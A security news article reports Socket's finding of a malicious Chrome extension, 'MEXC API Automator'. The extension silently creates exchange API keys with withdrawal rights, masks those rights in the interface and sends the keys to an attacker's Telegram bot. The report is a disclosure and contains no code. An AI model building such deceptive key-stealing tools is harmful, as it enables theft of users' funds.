Ddos 
The MEXC API Automator extension
A seemingly helpful tool for cryptocurrency traders has been exposed as a sophisticated wallet-draining trap. Socket’s Threat Research Team has identified a malicious Google Chrome extension, MEXC API Automator, that quietly hijacks user accounts on the MEXC exchange to steal funds.
Published on the Chrome Web Store on September 1, 2025, by an entity known as jorjortan142, the extension promised to simplify the complex process of managing API keys for high-frequency trading. Instead, it systematically looted the accounts of its users.
The genius of the attack lay in its deception. Users installing the extension believed they were getting a utility to automate trade execution. In reality, the software was a Trojan horse designed to grant the attackers total control.
According to the report, the extension “programmatically creates new MEXC API keys, enables withdrawal permissions, hides that permission in the user interface (UI), and exfiltrates the resulting API key and secret to a hardcoded Telegram bot controlled by the threat actor”.
This manipulation of the UI is particularly dangerous. Even if a vigilant user checked their settings, the extension would display the withdrawal permissions as “disabled,” while in the background, the server-side reality was the opposite. “The extension ensures the server side withdrawal permission is enabled while it appears disabled in the UI”.
Socket’s analysis of the code revealed interesting artifacts pointing to the malware’s origin. The researchers found numerous inline comments written in Russian, such as “Основная автоматизация” (main automation) and “Мониторинг изменений классa” (monitoring changes of the class).
“Russian language comments are frequent and concentrated around key logic, which strongly suggests that the threat actor behind the malicious Chrome extension is a Russian speaker,” the researchers noted, adding that this evidence supports a “moderate confidence assessment” linking the tool to a broader cluster of crypto-focused threats.
This cluster also connects to the “SwapSushi” brand, which appears across Telegram bots and YouTube channels linked to the same actor.
By installing the extension, users effectively handed over their digital keys. “Any MEXC user who installs MEXC API Automator and allows it to create an API key effectively hands full programmatic control of their account to the threat actor”.
The attackers didn’t need passwords or 2FA codes; they simply rode the user’s own authenticated session to generate the keys they needed to drain the vaults.
Socket has notified Google of the malicious extension.
Related Posts:
- 50K+ WordPress Sites Exposed: Admin Takeover via Uncanny Automator
- Sony Ends 18-Year Presence in Russia, Completing its Market Withdrawal
- Crypto Crisis: UPBIT Hacked for $369 Million in Solana-Based Tokens
- Solana Drainer Source Code Leak Reveals MS Drainer Connection, Underscores Growing Threat to Crypto Users
- Solana Drainer Source Code Leak Reveals MS Drainer Connection, Underscores Growing Threat to Crypto Users
Donate